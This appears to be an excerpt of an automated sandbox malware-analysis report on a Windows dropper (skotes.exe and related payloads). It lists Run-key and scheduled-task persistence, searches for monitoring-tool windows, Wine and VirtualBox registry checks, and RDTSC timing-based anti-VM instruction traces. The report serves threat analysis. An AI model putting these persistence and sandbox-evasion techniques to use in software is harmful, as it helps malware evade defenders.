Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\DocumentsGDHIDHIEGI.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e708276138.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e708276138.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run df5dd36577.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run df5dd36577.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 76f1524c8d.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 76f1524c8d.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 2023 -> 50435
Source: unknown	Network traffic detected: HTTP traffic on port 50435 -> 2023

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3FA61 second address: A3FA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3FA67 second address: A3FA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBAAF7 second address: BBAB06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F702C87CB96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBAB06 second address: BBAB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBAB0C second address: BBAB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jmp 00007F702C87CBA0h 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBAB26 second address: BBAB32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F702D6C0E46h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9BBC second address: BB9C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F702C87CB96h 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007F702C87CBA0h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 jg 00007F702C87CB96h 0x0000001d jmp 00007F702C87CBA8h 0x00000022 popad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push edi 0x00000027 jmp 00007F702C87CB9Dh 0x0000002c pop edi 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9D9A second address: BB9DD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E4Eh 0x00000007 jmp 00007F702D6C0E54h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F702D6C0E57h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9DD9 second address: BB9DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBA1B0 second address: BBA1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F702D6C0E46h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 jno 00007F702D6C0E46h 0x00000016 pop eax 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBA1CA second address: BBA1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBA1D0 second address: BBA1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jmp 00007F702D6C0E58h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jng 00007F702D6C0E46h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBA1FC second address: BBA200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBA200 second address: BBA20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F702D6C0E46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBE103 second address: BBE108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBE165 second address: BBE169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBE169 second address: BBE1B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F702C87CBA7h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 mov dword ptr [ebp+122D3371h], edi 0x0000001c push 00000000h 0x0000001e push E30DCDFEh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBE1B5 second address: BBE1BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
